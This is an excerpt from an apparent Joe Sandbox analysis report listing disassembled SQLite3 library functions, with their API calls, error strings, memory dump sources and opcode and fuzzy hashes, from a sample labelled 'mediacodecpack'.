                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_snprintf$sqlite3_vsnprintf
                                                                                        • String ID: $)><$sqlite_master$sqlite_temp_master
                                                                                        • API String ID: 652164897-1572359634
                                                                                        • Opcode ID: 8bad6b48079287e07d66e35ebf7d727d8c0cc4a3de3635d3393f65d8d520b325
                                                                                        • Instruction ID: a98725bc65f6cff0ffebef66634980575a39ba2d787d432de3c608a01e11e389
                                                                                        • Opcode Fuzzy Hash: 8bad6b48079287e07d66e35ebf7d727d8c0cc4a3de3635d3393f65d8d520b325
                                                                                        • Instruction Fuzzy Hash: 5991F275E05219CFCB15CF98C48169DBBF2BFA9308F14845AE859AB314DB34ED46CB81
                                                                                        APIs
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091B06E
                                                                                        • sqlite3_result_error_toobig.SQLITE3 ref: 6091B178
                                                                                        • sqlite3_result_error_nomem.SQLITE3 ref: 6091B197
                                                                                        • sqlite3_result_text.SQLITE3 ref: 6091B5A3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                                        • String ID:
                                                                                        • API String ID: 2352520524-0
                                                                                        • Opcode ID: 91a3e282f54c964bbb8224fbc5594699699e4a7ba29507b0b3f6ff953b241f0e
                                                                                        • Instruction ID: 99f21b63ad5c9672efebb0dd762c853f70c7e366ddc85f9db9da2d733c13ec0c
                                                                                        • Opcode Fuzzy Hash: 91a3e282f54c964bbb8224fbc5594699699e4a7ba29507b0b3f6ff953b241f0e
                                                                                        • Instruction Fuzzy Hash: F9E16B71E4C2199BDB208F18C89039EBBF7AB65314F1584DAE8A857351D738DCC19F82
                                                                                        APIs
                                                                                          • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                          • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                          • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                        • sqlite3_exec.SQLITE3 ref: 6096A4D7
                                                                                          • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                                        • sqlite3_result_text.SQLITE3 ref: 6096A5D3
                                                                                          • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                          • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                                          • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                        • sqlite3_exec.SQLITE3 ref: 6096A523
                                                                                        • sqlite3_exec.SQLITE3 ref: 6096A554
                                                                                        • sqlite3_exec.SQLITE3 ref: 6096A57F
                                                                                        • sqlite3_result_error_code.SQLITE3 ref: 6096A5E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_exec$sqlite3_bind_intsqlite3_freesqlite3_logsqlite3_mprintfsqlite3_resetsqlite3_result_error_codesqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                                        • String ID: optimize
                                                                                        • API String ID: 3659050757-3797040228
                                                                                        • Opcode ID: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                                        • Instruction ID: 653702cfcd2f061f0588c77de086fc27204f9fc351fc8b4992cba684a546c14d
                                                                                        • Opcode Fuzzy Hash: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                                        • Instruction Fuzzy Hash: E831C3B11187119FE310DF24C49570FBBE6ABA1368F10C91DF9968B350E7B9D8459F82
                                                                                        APIs
                                                                                        • sqlite3_column_blob.SQLITE3 ref: 609654FB
                                                                                        • sqlite3_column_bytes.SQLITE3 ref: 60965510
                                                                                        • sqlite3_reset.SQLITE3 ref: 60965556
                                                                                        • sqlite3_reset.SQLITE3 ref: 609655B8
                                                                                          • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                          • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                        • sqlite3_malloc.SQLITE3 ref: 60965655
                                                                                        • sqlite3_free.SQLITE3 ref: 60965714
                                                                                        • sqlite3_free.SQLITE3 ref: 6096574B
                                                                                          • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                        • sqlite3_free.SQLITE3 ref: 609657AA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_reset$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mutex_leave
                                                                                        • String ID:
                                                                                        • API String ID: 2722129401-0
                                                                                        • Opcode ID: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                                                        • Instruction ID: e3a8cc565ee031670952cbbbf81914cbe75110044a29491daaf6513bdc913a85
                                                                                        • Opcode Fuzzy Hash: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                                                        • Instruction Fuzzy Hash: BBD1D270E14219CFEB14CFA9C48469DBBF2BF68304F20856AD899AB346D774E845CF81
                                                                                        APIs
                                                                                        • sqlite3_malloc.SQLITE3 ref: 609645D9
                                                                                          • Part of subcall function 60928099: sqlite3_malloc.SQLITE3 ref: 609280ED
                                                                                        • sqlite3_free.SQLITE3 ref: 609647C5
                                                                                          • Part of subcall function 60963D35: memcmp.MSVCRT ref: 60963E74
                                                                                        • sqlite3_free.SQLITE3 ref: 6096476B
                                                                                          • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                        • sqlite3_free.SQLITE3 ref: 6096477B
                                                                                        • sqlite3_free.SQLITE3 ref: 60964783
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$sqlite3_malloc$memcmpsqlite3_mutex_enter
                                                                                        • String ID:
                                                                                        • API String ID: 571598680-0
                                                                                        • Opcode ID: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                                        • Instruction ID: 53ad94a03898eae12f4127695087571842428d6fdffc19c65fee49adcf86f1ae
                                                                                        • Opcode Fuzzy Hash: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                                        • Instruction Fuzzy Hash: 5E91F674E14228CFEB14CFA9D890B9EBBB6BB99304F1085AAD849A7344D734DD81CF51
                                                                                        APIs
                                                                                        • sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                          • Part of subcall function 60962F28: sqlite3_log.SQLITE3 ref: 60962F5D
                                                                                        • sqlite3_mprintf.SQLITE3 ref: 60963534
                                                                                        • sqlite3_blob_open.SQLITE3 ref: 6096358B
                                                                                        • sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                        • sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                                        • sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                                        • sqlite3_free.SQLITE3 ref: 60963621
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_blob_bytessqlite3_blob_opensqlite3_blob_readsqlite3_blob_reopensqlite3_freesqlite3_logsqlite3_mallocsqlite3_mprintf
                                                                                        • String ID:
                                                                                        • API String ID: 4276469440-0
                                                                                        • Opcode ID: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                                        • Instruction ID: 177081cd506585250240414a33056f89eeda992db91a315aff795e5fc91eaf1e
                                                                                        • Opcode Fuzzy Hash: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                                        • Instruction Fuzzy Hash: C641E5B09087059FDB40DF29C48179EBBE6AF98354F01C87AE898DB354E734D841DB92
                                                                                        APIs
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A240
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A24E
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A25A
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A27C
                                                                                        Strings
                                                                                        • LIKE or GLOB pattern too complex, xrefs: 6091A267
                                                                                        • ESCAPE expression must be a single character, xrefs: 6091A293
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_value_text$sqlite3_value_bytes
                                                                                        • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                        • API String ID: 4080917175-264706735
                                                                                        • Opcode ID: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                                        • Instruction ID: 7e7232241edcba55bc41816b79a09feadaac9d75cc2fb544db44a2248cbef301
                                                                                        • Opcode Fuzzy Hash: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                                        • Instruction Fuzzy Hash: A4214C74A182198BCB00DF79C88165EBBF6FF64354B108AA9E864DB344E734DCC6CB95
                                                                                        APIs
                                                                                          • Part of subcall function 6092506E: sqlite3_log.SQLITE3 ref: 609250AB
                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 609250E7
                                                                                        • sqlite3_value_text16.SQLITE3 ref: 60925100
                                                                                        • sqlite3_value_text16.SQLITE3 ref: 6092512C
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6092513E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_value_text16$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                        • String ID: library routine called out of sequence$out of memory
                                                                                        • API String ID: 2019783549-3029887290
                                                                                        • Opcode ID: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                                        • Instruction ID: f6310061860eb79c45c0a7b6efb00bde58ba827c5a391e7df96a4cb3fbc4cfa9
                                                                                        • Opcode Fuzzy Hash: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                                        • Instruction Fuzzy Hash: 81014C70A083049BDB14AF69C9C170EBBE6BF64248F0488A9EC958F30EE775D8818B51
                                                                                        APIs
                                                                                        • sqlite3_finalize.SQLITE3 ref: 609406E3
                                                                                          • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940672
                                                                                          • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940696
                                                                                        • sqlite3_free.SQLITE3 ref: 609406F7
                                                                                        • sqlite3_free.SQLITE3 ref: 60940705
                                                                                        • sqlite3_free.SQLITE3 ref: 60940713
                                                                                        • sqlite3_free.SQLITE3 ref: 6094071E
                                                                                        • sqlite3_free.SQLITE3 ref: 60940729
                                                                                        • sqlite3_free.SQLITE3 ref: 6094073C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$sqlite3_log$sqlite3_finalize
                                                                                        • String ID:
                                                                                        • API String ID: 1159759059-0
                                                                                        • Opcode ID: 19269ae46022e444f8470c890b78f38089a522c4155da373e534dfec766a18bc
                                                                                        • Instruction ID: 8ceab58ab7f3fb7faec85fb80e78016d1f3d655de586deaf1cb04ee1bc4e3406
                                                                                        • Opcode Fuzzy Hash: 19269ae46022e444f8470c890b78f38089a522c4155da373e534dfec766a18bc
                                                                                        • Instruction Fuzzy Hash: C801E8B45447108BDB00AF78C4C5A59BBE5EF79B18F06096DECCA8B305D734D8809B91
                                                                                        APIs
                                                                                        • sqlite3_free.SQLITE3(?), ref: 609476DD
                                                                                          • Part of subcall function 60904423: sqlite3_mutex_leave.SQLITE3(6090449D,?,?,?,60908270), ref: 60904446
                                                                                        • sqlite3_log.SQLITE3 ref: 609498F5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_freesqlite3_logsqlite3_mutex_leave
                                                                                        • String ID: List of tree roots: $d$|
                                                                                        • API String ID: 3709608969-1164703836
                                                                                        • Opcode ID: 4de08d56d8a6e192ae2dda07a929c8b2a00a3f2e2d212eb9bfb53aebfe2a6bac
                                                                                        • Instruction ID: c91562837ba2d96ae21b52ab8334c840e7cbe23d8154f1acff92b465618a0bd4
                                                                                        • Opcode Fuzzy Hash: 4de08d56d8a6e192ae2dda07a929c8b2a00a3f2e2d212eb9bfb53aebfe2a6bac
                                                                                        • Instruction Fuzzy Hash: 3FE10570A043698BDB22CF18C88179DFBBABF65304F1185D9E858AB251D775DE81CF81
                                                                                        APIs
                                                                                          • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                          • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                          • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                          • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 609600BA
                                                                                        • sqlite3_column_text.SQLITE3 ref: 609600EF
                                                                                        • sqlite3_free.SQLITE3 ref: 6096029A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_bind_int64sqlite3_column_int64sqlite3_column_textsqlite3_freesqlite3_resetsqlite3_result_error_codesqlite3_step
                                                                                        • String ID: e
                                                                                        • API String ID: 786425071-4024072794
                                                                                        • Opcode ID: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                                        • Instruction ID: e80500568aa73e744b5c90812a7938b6c4ac38b40afb48beb036dafaf3e7d002
                                                                                        • Opcode Fuzzy Hash: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                                        • Instruction Fuzzy Hash: 6291E270A18609CFDB04CF99C494B9EBBF2BF98314F108529E869AB354D774E885CF91
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_exec
                                                                                        • String ID: sqlite_master$sqlite_temp_master$|
                                                                                        • API String ID: 2141490097-2247242311
                                                                                        • Opcode ID: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                                        • Instruction ID: 9143400cfb6dc20a8edc2ca7c04099347fc9d468871a1d2187ae3123f936d49a
                                                                                        • Opcode Fuzzy Hash: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                                        • Instruction Fuzzy Hash: C551B6B09083289BDB26CF18C885799BBFABF59304F108599E498A7351D775DA84CF41
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$memcmpsqlite3_realloc
                                                                                        • String ID:
                                                                                        • API String ID: 3422960571-0
                                                                                        • Opcode ID: 50eda45380483794e32bdd730fc6b6b580c41d30328003452ec2c22d7d846426
                                                                                        • Instruction ID: 3b390e38dde49c5924589a602beaf2ee173d98914be71c714148da16d267e2cf
                                                                                        • Opcode Fuzzy Hash: 50eda45380483794e32bdd730fc6b6b580c41d30328003452ec2c22d7d846426
                                                                                        • Instruction Fuzzy Hash: 42B1D0B4E142189BEB05CFA9C5807DDBBF6BFA8304F148429E858A7344D374E946CF91
                                                                                        APIs
                                                                                          • Part of subcall function 6090A0D5: sqlite3_free.SQLITE3 ref: 6090A118
                                                                                        • sqlite3_malloc.SQLITE3 ref: 6094B1D1
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6094B24C
                                                                                        • sqlite3_malloc.SQLITE3 ref: 6094B272
                                                                                        • sqlite3_value_blob.SQLITE3 ref: 6094B298
                                                                                        • sqlite3_free.SQLITE3 ref: 6094B2C8
                                                                                          • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                                                          • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                                                          • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                                                          • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_freesqlite3_malloc$sqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_stepsqlite3_value_blobsqlite3_value_bytes
                                                                                        • String ID:
                                                                                        • API String ID: 683514883-0
